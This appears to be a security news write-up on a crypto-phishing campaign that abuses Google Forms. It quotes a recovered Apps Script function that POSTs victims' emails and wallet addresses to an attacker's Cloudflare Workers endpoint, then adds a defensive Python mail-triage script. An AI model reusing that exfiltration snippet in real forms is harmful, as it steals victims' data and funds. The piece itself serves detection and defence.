Google Forms, praised for friction-free data collection, has become the unlikely staging ground for a rapidly spreading crypto-phishing campaign.
First detected in late 2024 but surging in Q2 2025, the ploy begins with an unsolicited email containing a legitimate-looking forms.gle link that easily bypasses most spam gateways.
Once opened, the form impersonates a well-known exchange and congratulates the recipient on a “pending 1.275 BTC payout.”
A single click ushers targets toward a counterfeit withdrawal portal, where they are asked to “verify” a wallet address and pay a nominal “network fee.”
Within seconds the supplied credentials are siphoned to a command-and-control (C2) server hidden behind Cloudflare Workers, and any payment is spirited to mixer wallets, obliterating the money trail.
What makes the operation exceptional is its clever use of the Google Forms notification engine.
Because every lure originates from Google’s own SMTP infrastructure, domain-reputation checks almost always return clean results, granting the adversaries near-perfect inbox placement.
Kaspersky analysts noted the spike after observing a 63 percent rise in Google Forms-based phishing messages during routine telemetry reviews of consumer endpoints in early July 2025, flagging the campaign as one of the year’s most effective low-tech social-engineering attacks.
Infection Mechanism: Credential Harvesting via Embedded WebHooks
The malicious form leverages an Apps Script-bound WebHook that silently exfiltrates data the moment the victim clicks “Submit,” without waiting for form completion.
The script also injects a one-time JavaScript redirect to hxxps://claim-btc-id[.]online, a clone site hosting a polished React front end and a Python Flask API that proxies every request to the attacker’s C2.
The following trimmed snippet, recovered from a leaked form template, highlights the exfil routine:
// Apps Script trigger that fires when a response is submitted and forwards
// the captured fields to the attacker-controlled Workers endpoint.
function onFormSubmit(e){
  // e.namedValues is the event shape of a Sheets-bound "on form submit"
  // trigger: each question title maps to an array of answers.
  const payload = JSON.stringify({
      email: e.namedValues['Email'][0],
      wallet: e.namedValues['Wallet Address'][0]
  });
  // Exfiltration: an outbound POST, sent from Google's own infrastructure,
  // to the C2 relay hosted on Cloudflare Workers.
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
      method: 'post',
      contentType: 'application/json',
      payload: payload
  });
}
[Figure: the initial phishing message]
[Figure: the “Fake Withdrawal Portal” capturing the fake payout page]
Mitigation hinges on layered defenses: implement content-disarm rules that quarantine any Google Forms emails not explicitly whitelisted, and deploy browser extensions capable of blocking outbound requests to unfamiliar Workers domains.
Finally, security awareness programs must reiterate the timeless principle—free cryptocurrency never arrives via a form submission.
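The first two layers above (quarantine Google Forms mail that is not explicitly allowlisted, block requests to unfamiliar Workers domains) can be expressed as one gateway triage rule. The script below is an added example written for this page, not code from the article, from Kaspersky or from the campaign: it extracts every URL in a message, quarantines the message if any Google Forms link points at a form ID outside an explicit allowlist, and flags any link to a workers.dev host that is not already known. It deliberately ignores sender reputation, because the lures arrive from Google's own mail servers and would pass that check. The allowlisted form IDs, the trusted Workers hostname and the three sample messages are constructed for the example.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

# Form IDs the organisation actually publishes (hypothetical, constructed values).
ALLOWED_FORM_IDS = {"1FAIpQLSe-internal-it-survey"}

# Cloudflare Workers hostnames the organisation knows and trusts (hypothetical).
ALLOWED_WORKERS_HOSTS = {"intranet-tools.example.workers.dev"}

URL_RE = re.compile(r"https?://[^\s\"'<>)\]]+", re.IGNORECASE)


def extract_urls(text):
    """Return every http(s) URL in the text, in order of appearance."""
    return URL_RE.findall(text)


def google_form_id(url):
    """Return the form ID when url is a Google Forms link, else None.

    forms.gle/<id>                          -> <id>
    docs.google.com/forms/d/e/<id>/viewform -> <id>
    docs.google.com/forms/d/<id>/...        -> <id>
    """
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    parts = [p for p in parsed.path.split("/") if p]
    if host == "forms.gle" and parts:
        return parts[0]
    if host == "docs.google.com" and len(parts) >= 3 and parts[:2] == ["forms", "d"]:
        if parts[2] == "e":
            return parts[3] if len(parts) > 3 else None
        return parts[2]
    return None


def workers_dev_host(url):
    """Return the hostname when url points at a *.workers.dev host, else None."""
    host = (urlparse(url).hostname or "").lower()
    return host if host == "workers.dev" or host.endswith(".workers.dev") else None


def classify_message(raw_email):
    """Apply the layered rule to one RFC 822 message.

    'quarantine' when the mail carries a Google Forms link to a form that is not
    allowlisted, or any link to an unknown workers.dev host; 'deliver' otherwise.
    Sender reputation is not consulted: the lures pass it.
    """
    msg = message_from_string(raw_email)
    texts = []
    for part in msg.walk():  # handles both single-part and multipart bodies
        if part.get_content_maintype() == "text":
            payload = part.get_payload(decode=True) or b""
            texts.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    reasons = []
    for url in extract_urls("\n".join(texts)):
        fid = google_form_id(url)
        if fid is not None and fid not in ALLOWED_FORM_IDS:
            reasons.append(f"Google Forms link to non-allowlisted form {fid}")
        whost = workers_dev_host(url)
        if whost is not None and whost not in ALLOWED_WORKERS_HOSTS:
            reasons.append(f"link to unknown Workers host {whost}")
    return {"verdict": "quarantine" if reasons else "deliver",
            "reasons": reasons, "from": msg.get("From", "")}


# Constructed sample messages; the sender addresses are illustrative only.
LURE = """\
From: Google Forms <forms-noreply@google.com>
To: victim@example.com
Subject: Your pending 1.275 BTC payout is ready
Content-Type: text/plain; charset=utf-8

Congratulations! Confirm your wallet to release the payout:
https://forms.gle/AbCdEfGh12345
"""

INTERNAL_SURVEY = """\
From: Google Forms <forms-noreply@google.com>
To: staff@example.com
Subject: IT satisfaction survey
Content-Type: text/plain; charset=utf-8

Please take two minutes:
https://docs.google.com/forms/d/e/1FAIpQLSe-internal-it-survey/viewform
"""

WORKERS_LINK = """\
From: helpdesk@example.com
To: staff@example.com
Subject: Updated tooling
Content-Type: text/plain; charset=utf-8

New portal: https://payout-verify.workers.dev/claim
"""

if __name__ == "__main__":
    for sample in (LURE, INTERNAL_SURVEY, WORKERS_LINK):
        print(classify_message(sample))
```

The allowlist is keyed on the form ID rather than the sender, because the sender is Google for both legitimate and malicious forms; the same rule fits a mail-flow transport rule or a proxy URL filter, where the Workers check would be applied to outbound requests instead of message bodies.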